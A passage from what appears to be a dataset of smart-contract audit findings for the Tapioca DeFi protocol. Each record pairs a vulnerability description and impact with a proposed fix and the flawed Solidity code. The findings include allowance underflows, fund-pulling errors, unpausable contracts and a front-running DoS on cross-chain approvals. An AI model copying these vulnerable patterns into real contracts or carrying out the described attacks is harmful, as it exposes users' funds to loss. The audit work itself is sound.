_options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n -Underflow Vulnerability in `Market::_allowedBorrow` Function: Oversight with Pearlmit Allowance HandlingчmediumчThe protocol permits users to authorize spenders using the MarketERC20::approveBorrow function, and also includes support for allowances granted through the `Pearlmit` contract. However, an oversight in the _allowedBorrow function leads to an underflow issue when spenders utilize `Pearlmit` allowances, rendering them unable to execute borrowing actions despite having the necessary permission.\\nProtocol users can approve a spender via MarketERC20::approveBorrow function, to perform certain actions like `borrow`, `repay` or adding of collateral on their behalf. Whenever the spender calls any of these functionalities, down the execution _allowedBorrow is invoked to check if the caller is allowed to `borrow` `share` `from` `from`, and then decrease the spender's allowance by the `share` amount.\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nThe problem here is, _allowedBorrow will always revert due to an underflow whenever the spender is given an allowance in the `Pearlmit` contract.\\nTo Illustrate\\nAssuming we have two users, Bob and Alice, since `Pearlmit` allowance is also accepted, Alice grants Bob a borrowing allowance of `100` tokens for the collateral id using `Pearlmit`. 
Note that Bob's allowance in the Market contract for Alice will be `zero(0)` and `100` in `Pearlmit`.\\nWhen Bob tries to borrow an amount equal to his `Pearlmit` allowance, down the borrow logic `_allowedBorrow` is called, in `_allowedBorrow` function, the below requirement passes, since the returned `pearlmitAllowed` for Bob will equal `100` shares\\n```\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n```\\n\\nRemember Bob's allowance in the Market contract for Alice is `0`, but `100` in `Pearlmit`, but _allowedBorrow function erroneously attempts to deduct the share from Bob's Market allowance, which will thus result in an underflow revert(0 - 100).\\n```\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n```\\nчAfter ensuring that the user has got the approval, return when permission from `Pearlmit` is used:\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n+ if (pearlmitAllowed != 0) return;\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nOr remove support for `Pearlmit` allowanceчAlthough giving a spender allowance via `Pearlmit` will appear to be supported, the spender cannot carry out any borrowing action in the Market.ч```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n 
require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, \"Market: not approved\");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n -The repaying action in `BBLeverage.sellCollateral` function pulls YieldBox shares of asset from wrong addressчmediumчThe `sellCollateral` function is used to sell a user's collateral to obtain YieldBox shares of the asset and repay the user's loan. However, in the BBLeverage contract, it calls `_repay` with the `from` parameter set to the user, even though the asset shares have already been collected by this contract beforehand.\\nIn `BBLeverage.sellCollateral`, the `from` variable (user) is used as the repayer address.\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n\\nTherefore, asset shares of user will be pulled in `BBLendingCommon._repay` function.\\n```\\nfunction _repay(address from, address to, uint256 part) internal returns (uint256 amount) {\\n // rest of code\\n // @dev amount includes the opening & accrued fees\\n yieldBox.withdraw(assetId, from, address(this), amount, 0);\\n // rest of code\\n```\\n\\nThis is incorrect behavior since the necessary asset shares were already collected by the contract in the `BBLeverage.sellCollateral` function. 
The repayer address should be `address(this)` for `_repay`.чShould fix as follows:\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(address(this), from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(address(this), from, partOut);\\n}\\n```\\nчMistakenly pulling user funds while the received asset shares remain stuck in the contract will result in losses for users who have sufficient allowance and balance when using the `BBLeverage.sellCollateral` functionality.ч```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n -`leverageAmount` is incorrect in `SGLLeverage.sellCollateral` function due to calculation based on the new states of YieldBox after withdrawalчmediumчSee vulnerability detail\\n`SGLLeverage.sellCollateral` function attempts to remove the user's collateral in shares of YieldBox, then withdraws those collateral shares to collect collateral tokens. Subsequently, the received collateral tokens can be used to swap for asset tokens.\\nHowever, the `leverageAmount` variable in this function does not represent the actual withdrawn tokens from the provided shares because it is calculated after the withdrawal.\\n```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n\\n`yieldBox.toAmount` after withdrawal may return a value different from the actual withdrawn token amount, because the state of YieldBox has changed. 
Because the token amount is calculated with rounding down in YieldBox, `leverageAmount` will be higher than the actual withdrawn amount.\\nFor example, before the withdrawal, YieldBox had 100 total shares and 109 total tokens. Now this function attempt to withdraw 10 shares (calldata_.share = 10) -> the actual withdrawn amount = 10 * 109 / 100 = 10 tokens After that, leverageAmount will be calculated based on the new yieldBox's total shares and total tokens -> leverageAmount = 10 * (109 - 10) / (100 - 10) = 11 tokens\\nThe same vulnerability exists in `BBLeverage.sellCollateral` function.ч`leverageAmount` should be obtained from the return value of YieldBox.withdraw:\\n```\\n(uint256 leverageAmount, ) = yieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\n```\\nчBecause `leverageAmount` can be higher than the actual withdrawn collateral tokens, `leverageExecutor.getAsset()` will revert due to not having enough tokens in the contract to pull. This results in a DOS of `sellCollateral`, break this functionality.ч```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n -mTOFTReceiver MSG_XCHAIN_LEND_XCHAIN_LOCK unable to executeчmediumчIn `mTOFTReceiver._toftCustomComposeReceiver(uint16 _msgType)` If `_msgType` is processed normally, the method must return `true`, if it returns `false`, it will trigger `revert InvalidMsgType()` But when `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` is executed normally, it does not correctly return `true` This causes this type of execution to always fail\\nThe main execution order of `_lzCompose()` is as follows:\\nIf msgType_ == MSG_REMOTE_TRANSFER, execute `_remoteTransferReceiver()`\\nOtherwise, execute 
`_extExec(msgType_, tapComposeMsg_)`\\nOtherwise, execute `tapiocaOmnichainReceiveExtender`\\nOtherwise, execute `_toeComposeReceiver()`\\nIf the 4th step `_toeComposeReceiver()` returns false, it is considered that the type cannot be found, and `revert InvalidMsgType(msgType_);` is triggered\\nthe code as follows:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n\\nThe implementation of `mTOFTReceiver._toeComposeReceiver()` is as follows:\\n```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function 
_toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n //@audit miss return true\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n\\nAs mentioned above, because `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` does not return `true`, it always triggers `revert InvalidMsgType(msgType_);`ч```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n// Add the line below\\n return true;\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\nч`_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` `TOFTOptionsReceiver.mintLendXChainSGLXChainLockAndParticipateReceiver()` unable to execute successfullyч```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory 
oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n -Multiple contracts cannot be pausedчmediumчFor safety, tapioca has added `whenNotPaused` restrictions to multiple contracts But there is no method provided to modify the `_paused` state If a security event occurs, it cannot be paused at all\\nTake `mTOFT.sol` as an example, multiple methods are `whenNotPaused`\\n```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n 
whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n\\nBut the contract does not provide a `public` method to modify `_paused` Note: `Pausable.sol` does not have a `public` method to modify `_paused`\\nIn reality, there have been multiple reports of security incidents where the protocol side wants to pause to prevent losses, but cannot pause, strongly recommend adding\\nNote: The following contracts cannot be paused\\nmTOFT\\nTOFT\\nUsdo\\nAssetToSGLPLeverageExecutorч```\\n// Add the line below\\n function pause() external onlyOwner{\\n// Add the line below\\n _pause();\\n// Add the line below\\n }\\n\\n// Add the line below\\n function unpause() external onlyOwner{\\n// Add the line below\\n _unpause();\\n// Add the line below\\n }\\n```\\nчDue to the inability to modify `_paused`, it poses a security riskч```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n -Composing approval with other messages is subject to DoSчmediumч`TOFT::sendPacket` function allows the caller to specify multiple messages that are executed on the destination chain. On the receiving side the `lzCompose` function in `TOFT` contract can be DoS-ed by front-running the approval message and causing the `lzCompose` to revert. As `lzCompose` is supposed to process several messages, this results in lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract.\\n`TOFT::sendPacket` allows the caller to specify arbitrary `_composeMsg`. 
It can be a single message or multiple composed messages.\\n```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n\\nIf we observe the logic inside the lzCompose:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. 
If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n\\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAt the beginning of the function bytes memory `tapComposeMsg_` is the message being processed, while `bytes memory nextMsg_` are all the other messages. `lzCompose` will process all the messages until `nextMsg_` is empty.\\nA user might want to have his first message to grant approval, e.g. `_extExec` function call, while his second message might execute `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW`.\\nThis is a problem as there is a clear DoS attack vector on granting any approvals. A griever can observe the permit message from the user and front-run the `lzCompose` call and submit the approval on the user's behalf.\\nAs permits use nonce it can't be replayed, which means if anyone front-runs the permit, the original permit will revert. 
This means that `lzCompose` always reverts and all the gas and value to process the `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW` is lost for the user.ч`TOFT::sendPacket` should do extra checks to ensure if the message contains approvals, it should not allow packing several messages.чWhen user is granting approvals and wants to execute any other message in the same `lzCompose` call, the attacker can deny the user from executing the other message by front-running the approval message and causing the `lzCompose` to revert. The impact is lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract. This is especially severe when the user wants to withdraw funds to another chain, as he needs to pay for that fee on the sending chain.ч```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n -StargateRouter cannot send payloads and rebalancing of ERC20s is brokenчmediumчThe `Balancer.sol` contract can't perform the rebalancing of ERC20s across chains as the Stargate router is not able to send any payload and will immediately revert the transaction if a payload is included. In this instance payload is hardcoded to `\"0x\"`.\\n`Balancer.sol` contract has a `rebalance` function that is supposed to perform a rebalancing of `mTOFTs` across chains. In case the token being transferred through Stargate is an ERC20 it is using the Stargate router to initiate the transfer. 
The issue however is that the stargate router is not able to send any payload and will immediately revert the transaction if a payload is included.\\nIf we take a look at the code, there is a payload equal to \"0x\" being sent with the transaction:\\n```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\" => this is the payload that is being sent with the transaction\\n );\\n```\\n\\nAs a proof of concept we can try to send a payload through the stargate router on a forked network and see that the transaction will revert. p.s. make sure to run on it on a forked network on Ethereum mainnet.\\n```\\nfunction testStargateRouterReverting() public {\\n vm.createSelectFork(vm.envString(\"MAINNET_RPC_URL\"));\\n \\n address stargateRouter = 0x8731d54E9D02c286767d56ac03e8037C07e01e98;\\n address DAIWhale = 0x7A8EDc710dDEAdDDB0B539DE83F3a306A621E823;\\n address DAI = 0x6B175474E89094C44Da98b954EedeAC495271d0F;\\n IStargateRouter.lzTxObj memory lzTxParams = IStargateRouter.lzTxObj(0, 0, \"0x00\");\\n\\n vm.startPrank(DAIWhale);\\n vm.deal(DAIWhale, 5 ether);\\n IERC20(DAI).approve(stargateRouter, 1e18);\\n IStargateRouter(stargateRouter).swap{value: 1 ether}(\\n 111, 3, 3, payable(address(this)), 1e18, 1, lzTxParams, abi.encode(address(this)), \"0x\"\\n );\\n}\\n```\\n\\nIt fails with the following error:\\nBoth `StargateRouter` and StargateComposer have the `swap` interface, but the intention was to use the `StargateRouter` which can be observed by the `retryRevert` function in the `Balancer.sol` contract.\\n```\\n## Balancer.sol\\n\\nfunction retryRevert(uint16 _srcChainId, bytes calldata _srcAddress, uint256 _nonce) external payable onlyOwner {\\n router.retryRevert{value: msg.value}(_srcChainId, _srcAddress, _nonce);\\n}\\n```\\n\\nAs this 
makes the rebalancing of `mTOFTs` broken, I'm marking this as a high-severity issue.чUse the `StargateComposer` instead of the `StargateRouter` if sending payloads.чRebalancing of `mTOFTs` across chains is broken and as it is one of the main functionalities of the protocol, this is a high-severity issue.ч```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: \"0x0\"}),\\n _dst,\\n \"0x\" => this is the payload that is being sent with the transaction\\n );\\n```\\n -`mTOFT` can be forced to receive the wrong ERC20 leading to token lockupчmediumчDue to Stargate's functionality of swapping one token on the source chain to another token on the destination chain, it is possible to force `mTOFT` to receive the wrong ERC20 token leading to token lockup.\\nTo give an example, a user can:\\nProvide USDC on Ethereum and receive USDT on Avalanche.\\nProvide USDC on Avalanche and receive USDT on Arbitrum.\\netc.\\nThe issue here is that poolIds are not enforced during the rebalancing process. 
As it can be observed the `bytes memory _ercData` is not checked for its content.\\n```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n\\nIt is simply decoded and passed as is.\\nThis is a problem and imagine the following scenario:\\nA Gelato bot calls the rebalance method for `mTOFT` that has USDC as erc20 on Ethereum.\\nThe bot encodes the `ercData` so `srcChainId = 1` pointing to USDC but `dstChainId = 2` pointing to USDT on Avalanche.\\nDestination `mTOFT` is fetched from `connectedOFTs` and points to the `mTOFT` with USDC as erc20 on Avalanche.\\nStargate will take USDC on Ethereum and provide USDT on Avalanche.\\n`mTOFT` with USDC as underlying erc20 on Avalanche will receive USDT token and it will remain lost as the balance of the `mTOFT` contract.\\nAs this is a clear path for locking up wrong tokens inside the `mTOFT` contract, it is a critical issue.чThe `initConnectedOFT` function should enforce the poolIds for the src and dst chains.The rebalance function should just fetch these saved values and use them.\\n```\\n \\n@@ // Remove the line below\\n164,14 // Add the line below\\n176,12 @@ contract Balancer is Ownable {\\n * @param _dstChainId the destination LayerZero id\\n * @param _slippage the destination LayerZero id\\n * @param _amount the rebalanced amount\\n// Remove the line below\\n * @param _ercData custom send data\\n */\\n function rebalance(\\n address payable _srcOft,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n// Remove the line below\\n uint256 _amount,\\n// Remove the line below\\n 
bytes memory _ercData\\n// Add the line below\\n uint256 _amount\\n ) external payable onlyValidDestination(_srcOft, _dstChainId) onlyValidSlippage(_slippage) {\\n {\\n@@ // Remove the line below\\n188,13 // Add the line below\\n204,13 @@ contract Balancer is Ownable {\\n if (msg.value == 0) revert FeeAmountNotSet();\\n if (_isNative) {\\n if (disableEth) revert SwapNotEnabled();\\n _sendNative(_srcOft, _amount, _dstChainId, _slippage);\\n } else {\\n// Remove the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage, _ercData);\\n// Add the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage);\\n }\\n\\n \\n@@ // Remove the line below\\n221,7 // Add the line below\\n237,7 @@ contract Balancer is Ownable {\\n * @param _dstOft the destination TOFT address\\n * @param _ercData custom send data\\n */\\n// Remove the line below\\n function initConnectedOFT(address _srcOft, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n// Add the line below\\n function initConnectedOFT(address _srcOft, uint256 poolId, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n external\\n onlyOwner\\n {\\n@@ // Remove the line below\\n231,10 // Add the line below\\n247,8 @@ contract Balancer is Ownable {\\n bool isNative = ITOFT(_srcOft).erc20() == address(0);\\n if (!isNative && _ercData.length == 0) revert PoolInfoRequired();\\n \\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_ercData, (uint256, uint256));\\n// Remove the line below\\n\\n OFTData memory oftData =\\n// Remove the line below\\n OFTData({srcPoolId: _srcPoolId, dstPoolId: _dstPoolId, dstOft: _dstOft, rebalanceable: 0});\\n// Add the line below\\n OFTData({srcPoolId: poolId, dstPoolId: poolId, dstOft: _dstOft, rebalanceable: 0});\\n \\n connectedOFTs[_srcOft][_dstChainId] = oftData;\\n emit ConnectedChainUpdated(_srcOft, _dstChainId, _dstOft);\\n \\n function _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n// 
Remove the line below\\n uint256 _slippage,\\n// Remove the line below\\n bytes memory _data\\n// Add the line below\\n uint256 _slippage\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n// Remove the line below\\n }\\n// Add the line below\\n }\\n {\\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n// Remove the line below\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n// Add the line below\\n _routerSwap(_dstChainId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n \\n function _routerSwap(\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _srcPoolId,\\n// Remove the line below\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n// Add the line below\\n uint256 poolId = connectedOFTs[_oft][_dstChainId].srcPoolId;\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n// Remove the line below\\n _srcPoolId,\\n// Remove the line below\\n _dstPoolId,\\n// Add the line below\\n poolId,\\n// Add the line below\\n poolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n```\\n\\nAdmin is trusted but you can optionally add additional checks inside the `initConnectedOFT` function to ensure that the poolIds are correct for the src and dst mTOFTs.чThe impact of this vulnerability is critical. 
It allows for locking up wrong tokens inside the mTOFT contract causing irreversible loss of funds.ч```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n -Gas parameters for Stargate swap are hardcoded leading to stuck messagesчmediumчThe `dstGasForCall` for transferring erc20s through Stargate is hardcoded to 0 in the `Balancer` contract leading to `sgReceive` not being called during Stargate swap. As a consequence, the `sgReceive` has to be manually called to clear the `cachedSwapLookup` mapping, but this can be DoSed due to the fact that the `mTOFT::sgReceive` doesn't validate any of its parameters. This can be exploited to perform a long-term DoS attack.\\nGas parameters for Stargate\\nStargate Swap allows the caller to specify the:\\n`dstGasForCall` which is the gas amount forwarded while calling the `sgReceive` on the destination contract.\\n`dstNativeAmount` and `dstNativeAddr` which is the amount and address where the native token is sent to.\\nInside the `Balancer.sol` contract, the `dstGasForCall` is hardcoded to 0. 
